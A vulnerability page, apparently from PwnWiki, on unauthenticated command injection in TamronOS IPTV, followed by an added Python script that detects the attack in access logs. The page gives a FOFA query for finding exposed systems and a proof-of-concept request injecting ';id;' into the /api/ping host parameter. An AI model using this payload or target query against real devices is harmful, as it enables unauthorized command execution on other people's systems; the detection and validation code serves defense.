TamronOS IPTV system front-end command execution vulnerability

From PwnWiki

Vulnerability Impact

TamronOS IPTV All

FOFA

title="TamronOS IPTV系统"

POC

 /api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp

Then send the POC request to the front end in an unauthenticated (not logged in) state to try to execute the command.
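For the detection side, the following added example (not part of the original page) scans web access logs for `/api/ping` requests whose `host` value is anything other than a plain IP address or hostname, including URL-encoded forms. The combined log format, the function names and the sample log lines are assumptions constructed for this example.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# Assumption: the web tier writes common/combined-format access logs.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"(?=.{{1,253}}\Z){LABEL}(?:\.{LABEL})*")

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /api/ping?count=5&host=192.0.2.10&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Mar/2024:10:04:41 +0000] "GET /api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 200 87',
    '203.0.113.9 - - [12/Mar/2024:10:04:43 +0000] "GET /api/ping?count=5&host=%3Bid%3B&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 200 87',
    '198.51.100.7 - - [12/Mar/2024:10:06:00 +0000] "GET /api/ping?count=5&host=iptv.example.com&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 200 498',
    '198.51.100.7 - - [12/Mar/2024:10:06:05 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

def is_plain_host(value):
    """True only for a literal IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None

def host_values(query):
    """Yield each decoded host= value; split on '&' only so ';' stays in the value."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == "host":
            yield unquote_plus(raw)

def suspicious_ping_requests(lines):
    """Return (client, decoded host value) for /api/ping calls with a non-host value."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if url.path.rstrip("/") == "/api/ping":
            hits += [(m.group("client"), v) for v in host_values(url.query)
                     if not is_plain_host(v)]
    return hits

if __name__ == "__main__":
    for client, value in suspicious_ping_requests(SAMPLE_LOG):
        print(f"suspicious /api/ping host value from {client}: {value!r}")
```

The same allowlist check (`is_plain_host`) is the kind of server-side validation that keeps a `host` value from reaching a shell in the first place.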
